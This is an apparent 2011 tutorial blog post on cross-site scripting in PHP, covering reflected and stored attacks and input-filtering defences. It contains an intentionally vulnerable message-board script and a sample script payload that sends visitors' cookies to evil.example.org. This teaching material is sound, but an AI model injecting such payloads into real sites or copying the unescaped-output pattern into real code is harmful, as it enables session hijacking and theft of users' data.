Saturday, December 10, 2011

Cross-Site Scripting


What Is Cross-Site Scripting (XSS)?

XSS is just a special case of code injection. In this type of attack, the malicious user embeds HTML or other client-side script into your Web site. The attack looks like it is coming from your Web site, which the user trusts. This enables the attacker to bypass a lot of the client’s security such as the same origin policy, gain sensitive information from the user, or deliver a malicious application on web content by modern web browsers. Cross-site scripting attacks are there for special case of code injection.

There are two types of XSS attacks:
  • Reflected or nonpersistent
  • Stored or persistent

Reflected or nonpersistent XSS

This is the most common type of XSS and the easiest for a malicious attacker to pull off. The attacker uses social engineering techniques to get a user to click on a link to your site. The link has malicious code embedded in it. Your site then redisplays the attack, and the user’s browser parses it as if it were from a trusted site. This method can be used to deliver a virus or malformed cookie (used to hijack sessions later) or grab data from the user’s system. One famous example of this was found in Google’s search results. The malicious code would be tacked onto the end of a search link. When the user clicked on the link, the code would get displayed as part of the search string. The user’s browser would parse this and compromise his or her system.
Defend against this as you would any variable injection attack. Before you display any user-generated data, validate the input. Do not trust anything that the user’s browser sends you.

Stored or persistent XSS

This is a less common but far more devastating type of attack. One instance of a stored XSS attack can affect any number of users. This type of attack happens when users are allowed to input data that will get redisplayed, such as a message board, guestbook, etc. Malicious users put HTML or client-side code inside their post. This code is then stored in your application like any other post. Every time that data is accessed, a user has the potential to be compromised. Most of the time this is a link that still requires social engineering to compromise your users, but more sophisticated attackers will launch attacks without the user doing any more than loading your page.

This is all scary stuff, but the defense is the same: If you allow user input, validate it before you store it in your application.

How can this happen?

Consider the following example :
<form>
<input type="text" name="msg"><br />
<input type="submit">
</form>

<?php

if (isset($_GET['msg']))
{
    $fp = fopen('./test.txt', 'a');
    fwrite($fp, "{$_GET['msg']}<br />");
    fclose($fp);
}

readfile('./test.txt');
This message board appends to whatever the user enters, appends this to a file, then displays the current contents of the file.
Imagine if a user enters the following message:
<script>
document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie
</script>
The next user who visits this message board with JavaScript enabled is redirected to evil.example.org, and any cookies associated with the current site are included in the query string of the URL.
 

What can you do?

XSS is actually very easy to defend against. Where things get difficult is when you want to allow some HTML or client-side scripts to be provided by external sources (such as other users) and ultimately displayed, but even these situations aren't terribly difficult to handle.

 There are two ways you can handle patching your application. One is far easier and more secure but gives the user less flexibility. The other method allows a much wider range of user input but is much harder to implement securely.

The following best practices can mitigate the risk of XSS:
  • Filter all external data.
    As mentioned earlier, data filtering is the most important practice you can adopt. By validating all external data as it enters and exits your application, you will mitigate a majority of XSS concerns.

    Example: 
    <form>
    <input type="text" name="age"><br />
    <input type="submit">
    </form>
    
    <?php
    
    if (isset($_POST['age']) && is_numeric($_POST['age']))
    {
        //your code here 
    } ?>
  • Use existing functions.
    Let PHP help with your filtering logic. Functions like htmlentities(), strip_tags(), and utf8_decode() can be useful. Try to avoid reproducing something that a PHP function already does. Not only is the PHP function much faster, but it is also more tested and less likely to contain errors that yield vulnerabilities.
    Example :

    <form>
    <input type="text" name="message"><br />
    <input type="submit">
    </form>
    
    <?php
    
    if (isset($_GET['message']))
    {
        $message = htmlentities($_GET['message']);
        echo $message;
    }  
    ?>
    
  • Use a whitelist approach.
    Assume data is invalid until it can be proven valid. This involves verifying the length and also ensuring that only valid characters are allowed. For example, if the user is supplying a last name, you might begin by only allowing alphabetic characters and spaces.  It is better to deny valid data than to accept malicious data.
    Another Example: 
    <form>
    <input type="text" name="name"><br />
    <input type="submit">
    </form>
    
    <?php
    
    // you can accept only 'Dog' and 'Cat'
    $white_list = array('Dog','Cat');
    if (isset($_POST['name']) && in_array($_POST['name'],$white_list))
    {
        echo $_POST['name'];
    }
    ?>
    
  • Use a strict naming convention.
    As mentioned earlier, a naming convention can help developers easily distinguish between filtered and unfiltered data. It is important to make things as easy and clear for developers as possible. A lack of clarity yields confusion, and this breeds vulnerabilities.

If you decide to try to filter out malicious code from user input, I suggest looking into the following projects:

Wrapping It Up

Cross-site scripting is a hot buzzword in PHP security circles, but don’t let it intimidate you. It’s really just a new and interesting way of exploiting a variable injection attack. As long as you’re vigilant about sanitizing your variables, you should have no problems with XSS.